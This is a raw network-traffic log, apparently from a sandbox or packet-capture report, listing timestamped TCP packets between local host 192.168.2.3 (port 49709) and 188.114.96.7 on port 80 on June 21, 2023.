Jun 21, 2023 04:27:46.103368044 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103388071 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103389025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103410959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103434086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103435040 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103456020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103477001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103498936 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103499889 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103527069 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103529930 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103554964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103578091 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103593111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103600025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103621960 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103625059 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103645086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103666067 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103688002 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103703022 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103708982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103729963 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103751898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103756905 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103774071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103796005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103804111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103816986 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103838921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103863001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103863001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103913069 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103943110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103965998 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103990078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104002953 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.104012012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104015112 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.104033947 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104055882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104059935 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.104079962 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104082108 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.104103088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104135036 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.104149103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104173899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104192019 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.104196072 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104218960 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104239941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104260921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.104276896 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.104306936 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.104517937 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.531538963 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.531538963 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.548741102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.548795938 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.604520082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.604573011 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.604695082 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.683751106 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.683751106 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.700849056 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.700886965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.757752895 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.757811069 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.761338949 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.813144922 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.813589096 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.830332041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.830401897 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.892626047 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.892704964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.892754078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.892801046 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.892843962 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.892860889 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.892909050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.892915964 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.892955065 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.892987013 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893001080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893045902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893079042 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893090963 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893137932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893167973 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893182993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893229961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893260002 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893275023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893321991 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893359900 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893368959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893455982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893486023 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893501997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893565893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893600941 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893627882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893675089 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893706083 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893721104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893765926 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893796921 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893810987 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893857002 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893893003 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893901110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893951893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.893990993 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.893992901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894041061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894069910 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.894085884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894131899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894176960 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894201040 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.894221067 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894249916 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.894265890 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894310951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894339085 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.894356966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894401073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894435883 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.894444942 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894504070 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894535065 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.894562960 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894608974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894639015 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.894673109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894727945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894773006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894777060 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.894814968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894851923 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.894859076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894903898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894941092 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.894947052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.894989967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895023108 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.895032883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895076036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895117998 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.895121098 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895165920 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895195007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.895203114 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895246983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895282030 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.895289898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895354986 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895385981 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.895396948 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895441055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895483971 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895489931 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.895560026 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895596027 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.895625114 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895678043 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895708084 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.895725965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895793915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895829916 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.895843983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895889997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895924091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.895936966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.895982981 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896030903 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896034002 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.896075964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896121979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896122932 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.896167994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896198988 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.896214008 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896260023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896308899 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.896338940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896388054 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896421909 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.896430016 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896472931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896502018 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.896517992 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896562099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896605968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896614075 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.896650076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896680117 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.896713018 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896768093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896797895 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.896814108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896882057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896915913 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.896933079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.896979094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897008896 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897023916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897070885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897115946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897120953 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897161961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897202969 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897206068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897264004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897310019 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897320032 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897360086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897387981 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897397995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897435904 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897464037 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897474051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897516012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897547007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897553921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897593021 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897622108 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897629976 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897666931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897706032 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897713900 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897743940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897774935 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897795916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897841930 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897871971 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897880077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897922039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.897953033 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.897979021 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898019075 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898051023 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898056030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898094893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898124933 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898133039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898170948 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898209095 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898220062 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898246050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898283958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898292065 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898322105 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898351908 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898360014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898399115 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898427010 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898437023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898477077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898513079 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898515940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898554087 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898590088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898596048 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898627996 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898665905 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898700953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898720980 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898739100 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898773909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898809910 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898845911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898844004 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898876905 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898901939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898945093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.898973942 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.898982048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899034023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899090052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899101019 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.899133921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899172068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899209023 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.899220943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899259090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899302006 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.899305105 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899344921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899386883 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.899389982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899430037 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899463892 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.899480104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899542093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899585009 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.899591923 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899632931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899666071 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.899683952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899723053 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899755001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.899770975 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899808884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899842978 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.899853945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899890900 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899924994 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.899941921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.899991989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900036097 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900043011 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900082111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900115967 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900130987 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900171041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900213957 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900217056 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900259018 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900312901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900341034 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900362015 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900388956 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900392056 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900433064 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900474072 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900479078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900520086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900552988 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900568962 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900620937 CEST	80	49709	188.114.96.7	192.168.2.3
